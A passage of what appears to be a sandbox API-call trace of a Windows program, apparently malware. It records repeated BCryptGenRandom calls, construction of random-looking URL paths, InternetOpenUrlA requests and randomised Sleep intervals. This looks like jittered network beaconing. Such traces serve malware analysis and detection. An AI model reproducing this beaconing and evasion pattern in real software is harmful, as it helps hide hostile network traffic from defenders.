dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.972] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.972] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.972] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.972] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.972] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.972] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0187.972] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.972] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.972] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.972] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0187.973] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.973] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.973] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.973] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0187.973] GetProcessHeap () returned 0x440000 [0187.973] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473b90 [0187.973] lstrcpyA (in: lpString1=0x473b90, lpString2="" | out: lpString1="") returned="" [0187.973] lstrcatA (in: lpString1="", lpString2="/HkwMu3F54yfwkdg2ehv/XB6gef0gXx3mgkgcdasfyviwR0yL1fi/" | out: lpString1="/HkwMu3F54yfwkdg2ehv/XB6gef0gXx3mgkgcdasfyviwR0yL1fi/") returned="/HkwMu3F54yfwkdg2ehv/XB6gef0gXx3mgkgcdasfyviwR0yL1fi/" [0187.973] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0187.973] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="/HkwMu3F54yfwkdg2ehv/XB6gef0gXx3mgkgcdasfyviwR0yL1fi/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0187.973] GetProcessHeap () returned 0x440000 [0187.973] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473b90 | out: hHeap=0x440000) returned 1 [0187.973] GetProcessHeap () returned 0x440000 [0187.974] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b2c0 | out: hHeap=0x440000) returned 1 [0187.974] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0187.974] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0187.974] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0187.974] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0187.975] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0187.975] Sleep (dwMilliseconds=0x1c0df) [0188.268] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.268] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0188.268] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.268] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0188.268] GetProcessHeap () returned 0x440000 [0188.268] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f51b0 [0188.269] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.269] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0188.269] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.269] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f51b1, cbBuffer=0x26, dwFlags=0x2 | out: pbBuffer=0x4f51b1) returned 0x0 [0188.269] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.269] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0188.269] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.269] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.269] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.269] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.269] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.269] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.270] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.270] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0188.270] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.270] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.270] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.270] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.270] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.270] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.270] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.270] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0188.270] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.270] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.270] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.271] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.271] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.271] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0188.271] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.271] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0188.271] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.271] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.271] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.271] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0188.271] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.272] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0188.272] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.272] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.272] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.272] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.272] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.272] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.272] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.272] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.272] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.272] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0188.272] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.273] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.273] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.273] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.273] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.273] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.273] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.273] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0188.273] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.273] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.273] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.273] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.274] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.274] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.274] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.274] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.274] GetProcessHeap () returned 0x440000 [0188.274] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473140 [0188.274] lstrcpyA (in: lpString1=0x473140, lpString2="°QO" | out: lpString1="°QO") returned="°QO" [0188.274] lstrcatA (in: lpString1="°QO", lpString2="/3brlOpD0oixs8lqgG17v25wrdFl82law2qwwc/" | out: lpString1="°QO/3brlOpD0oixs8lqgG17v25wrdFl82law2qwwc/") returned="°QO/3brlOpD0oixs8lqgG17v25wrdFl82law2qwwc/" [0188.274] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0188.274] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="°QO/3brlOpD0oixs8lqgG17v25wrdFl82law2qwwc/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0188.274] GetProcessHeap () returned 0x440000 [0188.274] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473140 | out: hHeap=0x440000) returned 1 [0188.274] GetProcessHeap () returned 0x440000 [0188.274] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f51b0 | out: hHeap=0x440000) returned 1 [0188.274] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0188.275] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0188.275] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.275] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0188.275] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0188.275] Sleep (dwMilliseconds=0x1bbf4) [0188.600] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.600] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0188.600] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.600] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0188.600] GetProcessHeap () returned 0x440000 [0188.600] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a175c0 [0188.600] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.600] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0188.601] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.601] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a175c1, cbBuffer=0x16, dwFlags=0x2 | out: pbBuffer=0x3a175c1) returned 0x0 [0188.601] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.601] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.601] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.601] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0188.602] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.602] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0188.602] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.602] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.602] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.602] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.602] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.603] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.603] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.603] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.603] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.603] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0188.603] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.603] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0188.604] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.604] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.604] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.605] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.605] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0188.605] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.605] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0188.605] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.605] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.606] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.606] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.606] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.606] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0188.607] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.607] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a175d7, cbBuffer=0x31, dwFlags=0x2 | out: pbBuffer=0x3a175d7) returned 0x0 [0188.607] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.607] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.608] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.608] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0188.608] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.829] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.829] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.830] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.830] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.830] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.830] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.830] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.830] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.830] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.831] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.831] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.831] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.831] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.831] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.831] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.832] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.832] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0188.832] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.832] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.833] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.833] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0188.833] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.833] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0188.833] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.833] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.834] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.834] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0188.834] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.834] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.834] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 